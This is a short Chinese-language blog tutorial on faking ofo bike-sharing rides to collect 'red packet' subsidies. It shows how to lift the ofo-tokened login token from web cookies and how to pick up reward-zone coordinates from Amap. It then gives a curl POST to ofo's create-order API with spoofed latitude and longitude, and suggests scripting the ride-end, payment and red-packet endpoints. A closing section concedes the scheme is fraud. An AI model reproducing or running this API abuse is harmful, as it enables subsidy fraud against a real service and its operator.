0x00 前言
共享單車打的火熱,摩拜和ofo相繼推出了紅包車,初衷是讓用戶合理騎車和把“僵尸車”從小區角落騎出來;但是因為ofo無法對機械鎖實現準確的定位和開關狀態的判斷,導致ofo的紅包車成了“羊毛黨”的大肥羊。
0x01 準備
-
獲取ofo登錄token
至于怎么獲取到登錄token,只需要打開網頁版ofo,然后正常登錄,在cookie中找key為
ofo-tokened的即可,為一個uuid,并且基本不會過期。 -
確定紅包區
根據嘗試,一般小區為紅包區的可能性比較大,特征如下出現一片紅包甚至出現疊加。
確定紅包區域 -
獲取此地區坐標
ofo使用的是高德地圖,所以,地圖上的坐標與高德展示的一模一樣。在高德地圖上找到這個位置,右鍵選擇
這是哪兒在高德上找坐標-1然后選擇
更多->分享,復制分享鏈接,并在瀏覽器里打開。在高德上找坐標-2可以發現分享鏈接被轉為了含有
lng和lng的鏈接,這兩個就是坐標,保存下來。在高德上找坐標-3至此,所有準備工作都完成。
0x02 薅羊毛
既然是技術的薅羊毛,當然就不會使用 gps位置模擬器 這類東西;我們直接請求ofo的創建訂單接口即可。當然也可以配合結束接口``支付接口及搶紅包接口,自行寫個自動化腳本。
先大概說明下這個創建訂單接口:
curl --request POST \
--url https://san.ofo.so/ofo/Api/v2/carno \
--header 'content-type: application/x-www-form-urlencoded' \
--data 'accuracy=100.00000&altitude=40.11111&carno=1234567&lat=39.943589&lng=116.372412&source=2&source-version=12412&speed=-1.000000&tag=&token=xxxxxxx-xxxx-xxxx-xxxx-xxxxxxx&source-system=7.1.1&source-model=xiaomi_6plus'
-------
carno: 車牌號,最好從最近行程中找,并且是機械鎖
lat和lng對應上面的高德地圖的lat和lng
token:對應上面獲取到的網頁的`ofo-tokened`
只要關注上面的幾個參數就行
當然實用postman等這類http調試客戶端也是可以的,這里我直接用shell演示了。
如果返回如下字段,則說明薅羊毛成功,10分鐘后只需要在客戶端上結束即可。
查看返回結果
0x03 一些你必須知道的事情
目前法律范圍內,對于“羊毛黨”并無專門的規定及認定,因此只能提升技術力量,對“騙補”行為進行識別和介入。
“薅羊毛實質上是一種欺詐行為,涉嫌違法”,在“薅羊毛”過程中,行為人虛構“騎行”的事實,非法獲取平臺為用戶補貼的紅包,只是由于金額較低,往往無法對其進行有效制裁。
